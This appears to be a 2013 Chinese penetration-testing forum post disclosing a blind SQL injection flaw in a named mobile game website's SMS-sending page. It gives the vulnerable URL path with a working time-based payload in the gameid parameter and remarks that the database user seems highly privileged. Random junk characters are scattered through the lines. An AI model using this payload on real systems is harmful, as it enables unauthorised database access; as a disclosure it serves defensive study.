中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:
- u; Q  u( F( [凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
. e* \" K- A- o6 e/ {0 H0 N: A$ F3 }: i& V( |) Y) j
详细说明:
3 _; b3 i  ^6 e- G. r存在SQL盲注url:" s- G) [9 H5 A  n
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1) I. G  K% l; h9 b, `; ~2 y. L
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
* x5 Q, N# L% `2 ?! dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png, e9 B( a/ }: V* r- D. P
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg6 r0 H  g7 o; {$ v* j
0 `  p' F8 \3 S. v1 t

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2